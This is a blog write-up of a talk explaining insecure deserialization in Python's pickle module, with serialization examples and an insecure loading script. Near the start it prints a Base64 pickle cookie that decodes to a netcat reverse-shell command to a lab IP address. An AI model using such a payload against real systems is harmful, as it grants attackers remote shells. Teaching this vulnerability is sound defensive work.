Many people I ask fail to clearly explain how Insecure Deserialization exploits work. The bug is often hard to confirm and exploit. I wanted to learn more about this vulnerability, so I decided to give a talk at Null Hyderabad’s June meet. This blog is a write-up of the content delivered at the meetup. This is the second episode of “The Egg Series”.
Here’s a 45-second demonstration of the bug:
That’s all about it. Well, I’m just kidding.
Why discuss Insecure Deserialization?
If you have come here, you might have heard about this weakness already. It ranked 8th in the 2017 OWASP Top 10. In 2021, it was merged with similar issues and is now covered under A08:2021 Software and Data Integrity Failures. The OWASP 2017 page says that exploitation is somewhat difficult, as off-the-shelf exploits rarely work without modification. Some automated scanners can discover this flaw, but manual verification is required. However, the technical impact is high: it can lead to remote code execution. This is a perfect vulnerability to take a deep dive into!
Let’s look at the magic code I pasted into the cookie:
gASVNwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUQxxuYyAtYyBzaCAxOTIuMTY4LjE3LjEyOSA4ODg4lIWUUpQu
It’s a Base64-encoded string. It looks like the below after decoding it. Note the dot (.) at the end of it. We will talk about this later.
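One way to look at the decoded cookie without running it is the standard-library pickletools module, which only disassembles a pickle and never executes it. This is a sketch for illustration, not the tooling used in the demo, and the variable names are made up for this example.

```python
import io
import pickletools
from base64 import b64decode

# The cookie value shown above, copied verbatim.
cookie = "gASVNwAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUQxxuYyAtYyBzaCAxOTIuMTY4LjE3LjEyOSA4ODg4lIWUUpQu"

raw = b64decode(cookie)
print(raw)        # the raw byte stream
print(raw[-1:])   # the last byte is the dot mentioned above

# pickletools.dis() only lists the opcodes. Unlike pickle.loads(),
# it does not import or call anything named inside the stream.
listing = io.StringIO()
pickletools.dis(raw, out=listing)
print(listing.getvalue())
```

The listing names a module, a function and an argument, followed by a REDUCE opcode. Keep that in mind for later.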
Introduction
We’re talking a lot about Serialization, so let’s understand that first. The Wikipedia definition says:
Serialization is converting an object to a format that can be stored, transmitted and reconstructed.
Let’s take an example from the Marvel movies. You can say that Bruce converting to Hulk is Serialization. When Bruce has to talk to the other Avengers (similar types), he is a normal human scientist. When he has to deal with Aliens (creatures from a different world), he converts into Hulk. Remember this point; we will connect it later.
By the way, he says “I’m always angry” in the above scene!
Let’s dig into the words underlined above.
Object:
Let’s look at Bruce, I mean Object first.
character = {"first_name": "Bruce", "last_name": "Banner"}
This is a dictionary in Python. character is an Object. Generally speaking, an Object is a material thing that can be seen, touched, held, etc. In Object-Oriented Programming (OOP), an Object is an Instance of a Class. A Class defines the characteristics and features. The class Mobile defines what a mobile is like (dimensions, color, weight, etc.) and what it does (making a phone call, browsing the internet, etc.). my_mobile, if instantiated from the Mobile class, follows the characteristics and functions of the class. When you say Mobile, you are generalizing; we get what you mean by a Mobile. When you say my_mobile, you are referring to the specific mobile phone you own. All academics, isn’t it?
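The Class-versus-Object distinction can be sketched in a few lines. Only the names Mobile and my_mobile come from the text; the attributes and the call() method are made up for illustration.

```python
class Mobile:
    """Defines what every mobile looks like and what it can do."""

    def __init__(self, color, weight_grams):
        # Characteristics (hypothetical attributes for this example).
        self.color = color
        self.weight_grams = weight_grams

    def call(self, number):
        # A feature shared by every instance of the class.
        return "Calling %s from my %s mobile" % (number, self.color)


# my_mobile is one specific Object (instance) of the general Mobile class.
my_mobile = Mobile(color="black", weight_grams=170)

print(isinstance(my_mobile, Mobile))
print(my_mobile.call("555-0100"))
```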
A dictionary in Python is a data type. Are you saying it’s a class?
The difference between types and classes got thinner and thinner, and in Python 3 dict is a class. There is some discussion about this on Stack Overflow.
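You can check this yourself in a Python 3 interpreter. A quick sketch:

```python
character = {"first_name": "Bruce", "last_name": "Banner"}

# The type of the dictionary is the class dict.
print(type(character))              # <class 'dict'>

# dict itself is a class: an instance of type, like user-defined classes.
print(isinstance(dict, type))       # True

# So the dictionary is an Object, an instance of that class.
print(isinstance(character, dict))  # True
```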
Stored. Why?
As a programmer, you want to manage the state of an object and persist it to process later. You may want to recreate the object after the program has terminated, in the same program or in a different program running on another machine. We would store them on Disk, Database, Cache, Socket, Message Bus etc.
Transmitted. Why?
The object might need to be shared between the server and its clients, the end users. It could be sent over to another technology. A process P1 on machine M1 can send a rich Object to a process P2 running on another machine M2.
Reconstructed. Why?
The object sent from the client’s browser may need to be reconstructed into native objects on the server side, or another technology may need to process it. This could be a shared service, a microservice and so on.
Why do we Serialize?
An Object created in one environment can’t be understood by another. For example, if you create an object in Python and send it to a Java process, the JRE can’t know what the object is made of, that is, its characteristics and features. Or the objects need to be exchanged between different layers, such as Browser to Server, or File or Database to business layer. You may want to get a task done by a microservice running at an external location and pass an object to it. Blame Object-Oriented Programming and the MVC design pattern: we see everything as Objects and Models.
Examples of Serialize & Deserialize
In serialize.py, I’m initializing character with first_name and last_name. I’m printing the raw Python object and the serialized object. dumps() is a function in the pickle module, used to dump the object into a serialized byte stream.
import pickle

def just_serialize():
    character = {"first_name": "Bruce", "last_name": "Banner"}
    print(" ---- The Object ----")
    print(character)
    serialized_character = pickle.dumps(character)
    print(" ---- The Serialized Data ----")
    print(serialized_character)

if __name__ == '__main__':
    just_serialize()
Take a look at the output below. This is how serialized data looks when printed: a byte stream, with the non-printable bytes shown as hex escapes.
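Here is a small sketch that pokes at those bytes. I am pinning protocol=4 as an assumption so that the header is predictable; the default protocol depends on the Python version you run.

```python
import pickle

character = {"first_name": "Bruce", "last_name": "Banner"}

# Pin the protocol so the stream looks the same across Python versions.
serialized_character = pickle.dumps(character, protocol=4)

print(type(serialized_character))   # the result is a bytes object
print(serialized_character.hex())   # the same stream, fully in hex

# The stream starts with the PROTO opcode (0x80) and the protocol number...
print(serialized_character[:2])
# ...and ends with the STOP opcode, which is the dot character.
print(serialized_character[-1:])
```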
Similarly, in deserialize.py, I’ve hard-coded the same serialized byte stream and created the character object out of it. loads() accepts a byte stream and converts it into an object.
import pickle

def just_deserialize():
    content = b'\x80\x04\x95/\x00\x00\x00\x00\x00\x00\x00}\x94(\x8c\nfirst_name\x94\x8c\x05Bruce\x94\x8c\tlast_name\x94\x8c\x06Banner\x94u.'
    print(" ---- The Data before deserialization ----")
    print(content)
    pickled_object = pickle.loads(content)
    print(" ---- The Object after deserialization ----")
    print(pickled_object)

if __name__ == '__main__':
    just_deserialize()
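Putting the two scripts together, a round trip gives back an equal object, but not the very same object in memory. A minimal sketch:

```python
import pickle

character = {"first_name": "Bruce", "last_name": "Banner"}

# Serialize and immediately deserialize.
restored = pickle.loads(pickle.dumps(character))

print(restored == character)   # True: same content
print(restored is character)   # False: a newly built object
```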
Let’s gear up and apply Base64 encoding and decoding to the same data, which is the usual pattern for easier transmission and storage. I’m assuming the client will serialize and the server will deserialize.
# Client side: serialize, then Base64-encode
from base64 import b64encode
import pickle

def just_serialize():
    character = {"first_name": "Bruce", "last_name": "Banner"}
    pickled_object = pickle.dumps(character)
    pickled_object = b64encode(pickled_object)
    print(pickled_object.decode("utf-8"))

if __name__ == '__main__':
    just_serialize()

# Server side: Base64-decode, then deserialize
from base64 import b64decode
import pickle

def just_deserialize():
    content = b'gASVLwAAAAAAAAB9lCiMCmZpcnN0X25hbWWUjAVCcnVjZZSMCWxhc3RfbmFtZZSMBkJhbm5lcpR1Lg=='
    content = b64decode(content)
    user_data = pickle.loads(content)
    print(user_data)

if __name__ == '__main__':
    just_deserialize()
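Why bother with Base64 at all? A short sketch of the reason, using the same character object:

```python
from base64 import b64encode, b64decode
import pickle

character = {"first_name": "Bruce", "last_name": "Banner"}
raw = pickle.dumps(character)

# The raw pickle contains non-printable bytes (for example 0x80 at the
# start), which is awkward to place in a cookie or a text field.
print(raw.isascii())

# Base64 turns it into plain ASCII text that survives such transports.
encoded = b64encode(raw)
print(encoded.isascii())

# Base64 is an encoding, not protection: anyone can reverse it.
print(pickle.loads(b64decode(encoded)) == character)
```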
Python Pickle
You may be wondering about dumps() and loads() from Pickle. Pickle is Python’s built-in module for serializing and deserializing.
Pickling is a way to convert an object into a Byte Stream. It’s also called Serializing, Marshalling and Flattening. dumps() returns the byte stream; there is another function, dump(), which writes it into a File. There is no other difference.
Unpickling is the opposite of Pickling. It converts serialized data back into Objects, whose properties you can read and whose methods you can call. loads() accepts a serialized byte stream, and load() reads the serialized stream from a file.
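The four functions can be compared side by side. In this sketch I use io.BytesIO as a stand-in for a real file, which is my choice for the example and not something from the talk.

```python
import io
import pickle

character = {"first_name": "Bruce", "last_name": "Banner"}

# dumps() returns the byte stream directly.
as_bytes = pickle.dumps(character)

# dump() writes the same stream into a file-like object.
buffer = io.BytesIO()
pickle.dump(character, buffer)
print(buffer.getvalue() == as_bytes)

# loads() reads from bytes, load() reads from a file-like object.
buffer.seek(0)
print(pickle.loads(as_bytes) == pickle.load(buffer))
```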
As a programmer, you tend to prefer built-in modules over third-party libraries, which is why you see Pickle so commonly.
But the Problem is..
Python’s official documentation on Pickle says the module is not secure and warns us to only unpickle data we trust. It even states that it is possible to construct malicious pickle data which will execute arbitrary code during unpickling.
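To make that warning concrete, here is a deliberately harmless sketch. A pickle can name a callable and its arguments, and pickle.loads() will call it while rebuilding the object. The Harmless class is hypothetical and only calls print(); it illustrates the mechanism and is not the exploit from the demo.

```python
import pickle


class Harmless:
    # __reduce__ tells pickle how to rebuild the object: "call this
    # callable with these arguments". Here the callable is benign.
    def __reduce__(self):
        return (print, ("this message is printed by pickle.loads()",))


data = pickle.dumps(Harmless())

# loads() calls print(...) as a side effect of unpickling.
result = pickle.loads(data)

# We do not even get a Harmless instance back, only print()'s return value.
print(result)
```

Whoever writes the byte stream chooses the callable. The code that calls loads() has no say in it.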
Let’s experiment with what the Python documentation says.
serialize-to-file.py initializes a dictionary object and dumps it into a file. deserialize-from-file.py reads a pickle file from the file system, creates an object out of it and prints the first_name and last_name. This is very similar to what we saw before; the only difference is that the object is dumped to and loaded from a file.
# serialize-to-file.py
import pickle

def just_serialize():
    pickle_file = "user.pickle"
    character = {"first_name": "Tony", "last_name": "Stark"}
    print("Pickling the below object:")
    print(character)
    with open(pickle_file, "wb") as file:
        pickle.dump(character, file)
    print("Pickled to: %s" % pickle_file)

if __name__ == '__main__':
    just_serialize()

# deserialize-from-file.py
import pickle

def insecure_deserialize():
    pickle_file = "user.pickle"
    with open(pickle_file, "rb") as file:
        print("Deserializing %s" % pickle_file)
        user = pickle.load(file)  # INSECURE!
    print("First Name: %s and Last Name: %s" % (user['first_name'], user['last_name']))

if __name__ == '__main__':
    insecure_deserialize()
Now imagine that user.pickle is supplied by untrusted end users. After all, it’s coming from the file system. There can be some low-privileged users who have write access to, or control over, the pickle file, and they can change the content of user.pickle. An untrusted user can control the serialized stream and possibly replace the legitimate data with bad objects. How can this lead to remote code execution?
Continue Reading: How Eggxactly Insecure Deserialization Exploit works – Part 2